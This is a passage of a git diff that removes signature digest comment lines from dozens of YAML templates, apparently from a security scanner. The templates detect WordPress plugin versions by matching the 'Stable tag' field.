a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e65bf49e1677d657f00667081eebc8590aeab4a7765f1e78940f1040a4c991b022060da02ffc1da19c2be8c56a85a8305bb28f4911b24c8e7c6b61be231223c4c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 1ea40e7dee..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a3f0215c942d8de38da327d367599961a639faffe35bfd4a25a78c4b4a12991a0220246f103d9b8a70799b08f16102798e206dacd5b82e0fb630c09a27a86217c7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0822240fc0..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069508cbb4228c36f569943d2999a7f15ef10c0af1f1e3e901bf0feee3b13be7a022100f713cf2ca04a28f5930532f92adffe0ee1e942e9c259637685986d7bea2d8f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 7328cc2811..6ff90e0902 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070ac909e2f6db9a80b3ed34402dad177d90f45d2eacaedbc22be63b7c802b76702204478f4bd475ff56c43d6cf7179c9829d82b84cae9b3d7ea2549a78b36a73a44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 409eeb45cc..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ae3673b5c1f3ae72bc01d9b0d58ecede2e9aa668eea2dee0e42d259624926f9022100b7ddae1e3e4fd1d739c1b7f07c465a5fc5526913c3ffd1bdafa9399e5837a0e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 5b40c7ddba..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045d6ad1d5d994febb33eabea6074cbe298de234587df101f99d31daa7f62966f02207e2bf97b377f6f583428c5968c3dcc09d033edbd0d2ea4c248b5a7cf440e7e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 14ac887ee8..27e45e39ca 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddb9a5692ea63eb8d68b96a3dcecd5312e3d67173bb2cbab60f1fe62ba25156b02201ad1ab7bdca47c33b1b1db923a96ed6f19499ac653db2f7fe5c3f185abf889d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 72b4c08e30..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007b5e137f97c949b4412522a8619a1f6d269d0b5fc25ba4da6246bc92e30efb702205e64a4c6997c35a589c3317d0ad543d4eaaeebd2f85a7821ca667068f2b4bbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index cb71e68e08..d679d8df61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052cf9643c3a412a97bb815c69d9630f63b71022d556262accd2696ac9c00af9402207359407deaf1e675867ba2e45205480ea2e29cebe0a47a5d507c5b3ac0d8be64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 2b4913e553..8bfe16ca84 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5dbca29e97519100bf4f9115d51b6cee88c4605bca0e408607005ffdb3896f1022100caad460cdb947b59cc9ac36e722ed7074ab66890459b0517b9f5a7b1278850da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 46221066b2..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d6e20783de81b7286f5209d2d4b7156dcd85223621e4fb8b414b074677711ba02201a3edd65af570f5b3c59943076059f6c37aaa4f805d91dbae91eb9aac0916aa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 12dc5c024b..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e90c68550e535ab545255fb7e2fffe799dcbde6ccaa10b1c2da06ae5000ceb1e02202a591006fc038008637d29dd43faa0ca53d2b76e8377cd64d6ee8793ecea6a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 715991395e..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bec325a4de2630eb9caef87cde24dd511760afb9ff186bcaf177ca8a024862802207e18ce751df24dc80acff01eb6da073cf5e687f4c5da31fd13d7c09c0b0fda47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 87fb899b35..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7f4d5e2458a4ad967e5e57608c3c7778b13836bc75f3929af83e20c0ea2c47202200c9fafd25fc711f7f6e9869abf1f327c4f8fc9c0b53b4272f7a9c9b42e332f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 6a62aa29d8..67968fb008 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207308c8a52a71192a40bdbde63577ef80182704daddc87029737ec7288fdfb9ad022066f449151ed4e194a7a2498514ec35310490c2985c9c979c89e9f6a047f44be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 668e46be65..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb4f749cce1250c7d601efc1c39d7293b38ec45393630a8a35aca8f2daef8c5602200766f79d3b3789c350c9a3ed245a54edf2de61530507cd44809cf29a3b3a28e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index dbe2417dee..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c43a256569f45dfbe3cdf9764cc22f22bd1539a3f567d6a6cb8d1dbcdf524890220085179cc61ff34105c0076ce6c06aeaa6e89bf493a44277ea28071ed8a4f1840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2cf26b769d..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a372857b53f618b34ed5e79c9183a2f801e9e87190075bb2a2c5dfcc83f7c756022100e8ed8bad6482fb82623d29be894a712c7d754e72d1215cf95d1ddd327b07b2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 6b2096eb65..d22f60a5cd 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100854e1fbc502aa4e0b430e4279408d47c0b3a9ef2b4b59a90b828b46b4b4393d9022100ede393e131b3c5033252480ea248aff1c64b1f868a33a9cb5386353700d01d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 89b2c3371c..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206db607bbbd99959a0504e2c6342138e9061e58df22c6e536a3922ec9cdbd2744022100b466bda4b0180cec4a1baf72093275aea9fd83dfc9107dc2005483e6c6c4d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 115a21cc86..2d4f463d97 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f3f251eb47e7ca56a067e86d4d41ba9dc33067adecbc6a623b04365a7087f9302202886fa9b9b7711e0fe6eb93c3ad716c0345ec2c2b64a5273dcde83380d54f494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 49aed81b7d..cb67671918 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220410f5766f550d76628d7339635f1f69645149932b29c0a0ebe29ef0e1a2d1384022100c5be6922fdd83987fc421431a613761dd2b359f555f175653bc76bbd6970d36b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index e332e97b3c..cc3eb2481a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024ca7288d05c5a9f01ee2bce4d7294e5d959f1ce543289d9ca5cae26f86a8cdc022049530c126087d864f602463cbda6f4f339e1f6d0a5e9dfb20399d6b186e7cd46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index dd3d33b27d..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031bb2a51d7aaab1050897b976273123c34e4bf14cef6a20797c240d66dbf2470022100ca29ecb82fdaf7ab39d3b1f3796a04c8160b8b090e4ef0b60578c6c63034d696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 1d0249256b..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f832a3982f73f212e8b2a3913f4e342648a1d29179f17b1c35d3191fb425d1ac022026e7e5d11075c8df401683616d753e4c94f2a90f093157525f3f2363fcfed8d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index e4c56b13a2..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0c15ff9893005d08746fc1cffe46ecc8ef0deefb027d2380922f3f8b36ba616022100f71bb550dc50523c4c8c1f2e167bb0df6d606e272af4665cf737321370ed8299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 02c1f7a4ec..a33aa7964f 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a03759e89ec1d6f9bcb41e7110891416e11533c9a1c76983ffac485904b952690221008815e3d03845d0513dbcda81cc1a210adcb0c28d0b524a8747a8eafe7f18377d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index ef8b3aae54..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084ebbdd70f8ea08571efee27574e0a47292f4826a859c012272ddf51a8fa604a022100e18ffa8aa1a5a063ba2c5b6762ca4aadb0edb8cc215774dd50ae51ad58f2f733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e958055a3d..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c69dce0970dfdbed0cc610608501e692c70902a7a26c2e9cd4832479eceb3e022100a4bf74f4bb5e65a390eae28e16587361ac169810695c93eda856f99c94093e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 5c5eb1c721..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd4696c16f1e1d9a447844fc2e0ea75e4faa6fde9376ceb862d84809c7d0574502206833636815c46085b94bd367ecdd0eec06b36b5476f2ca052de28c87b4a85e9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 374bc3659c..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200709c1a7bcd0b7ee36434ed70d680d4bedcbcd1d8328fc90636365eec1a71938022060c63cba48aae720b76a78a8cf3a462d30be0a07b8c78237a01e1e7789cd4423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 57d3998512..7776b209df 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053054701a9cba5b82343638e670389cedd204edaf98adcdb7883849a4e6277120220290be4713c8845d2dbc3c4259c5ea4274739d49f20580f7be8e0da9d3bb0789a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index d14e0c5229..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dc101d5d7bcdd4fe72b1c438bfa49d8aa5e39d03474859d28d9027cb5438dc8022064955aaa3f6f80195935d871b3909047e7ed5160941634dfe068c91af7e3c630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 15e4a110a6..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220792b56d26c4eb54d9990c0530ad2bb570624f58feba85fa815f21a673e8d5fc0022035756b46f0a03afc928d3e2ff95148bed7bad2d96e230c2709897b14608700d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 01cacc8be3..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e26c682bb0cd4577525009a15e34b635239562b40402613f3f1deef053a50cff0220655ae08e8ba975bda1a8ef842cc0f296427b0c713cd6aebbbae6d8c1e17ea46e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 031222c1ce..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ee3dffc0fe89987e0b8fabc0c9a28540a845dfd723c9fe0fc7511c11928171102200e025d0887c2283da867b0165d301340e81e5a3c78fcf3b3432056c734a234bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 757042bf8c..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023b64c49289a3783d7544de10aa1ae06d02c7ba8e3a37310b26818cbe0586759022100ed6d170466df1344664faca9c42b34544550e4ed3adafd1fb19a92ebd13abb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index a181ef0dd3..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e24132c5fc464dff396fa959b3dee4db4fc86bbac0bef657f0fbc717abb92ca00220036dad75bce505270bdab634f41214737fede2c9c6b34283c90dcbe1f72fa918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index ceac870b91..9d77ce9155 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084b76e2ada6a7b1cacbd59be54630869ad289a861c2285978a24c3c4bf5a8d03022061f463933927654fa13e3de021d32c5d25d71162f377dd68642f436270c1aacb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 4755a7e85c..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220205848229075e0c750550406f315e6f495b6c4495cf889d5083963813c72f50802200448a2902546393ab68805fcf8603f17af77292407b9122aa25d455ca54f63d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 0a8a7d13ca..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078f238de913c037ca83098c12988b9fcf6b1f8fc7c135934836fce4e40fa150c02200ee73b70b2436be4abe8632dd57de3f6c0e25de7a38c064810828b60bf346649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 045b76d6e8..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f3af5b7d7b6854548ec355188286d7df58bd893d1eebc0643f1e405fad33fe9022100bb9801207804279068c9e9154ee50dd6a39735c249592151bcd509455359f64b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 6c110fc9e9..34d36d4349 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddc055a6a3e83e74b547d439e33d75ee2111e3fb464a4d013cae6fe534a112bf02202fb7481111804925e874eb9c14ece52f9cbd335328612e9266b4405dc6b1a1e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 51071c9517..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204ba741ffaf9de05e1661562e2bf7e6dd2bcb5a5b86e9bea7c76350ab9baca822022100b0b175a51822462907e145460ffed3d0d7b80af957b14140fd4438ff0bef8e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 20af30a857..39b176dcb8 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0ad1f462287ba0b61d016390dcd1db953f6af7e2ebc991f010e01017bc23f8d022100fff392bae252ab18a605073cd33c61cce022d1977201280aabc0e81335d35306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 7d4aa5f09b..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbe0632e111132dc56a1e3d0e63c3bac51329e692f723ff48e76ff92b249a693022061e78cddd016ac39c290274884960c8de7704a2eb73edd9641add5312d50cc64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index cc8db87d33..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204bf3105712d62ea325ac908d4ea70d1cca1f43fd1fae766ba5e330a2a50b5cc2022030ddc6beec61260a1c3b066079dc48b4f114e3b5b6fe0b6a80feeffdddbb8bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 7db239a3a3..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ 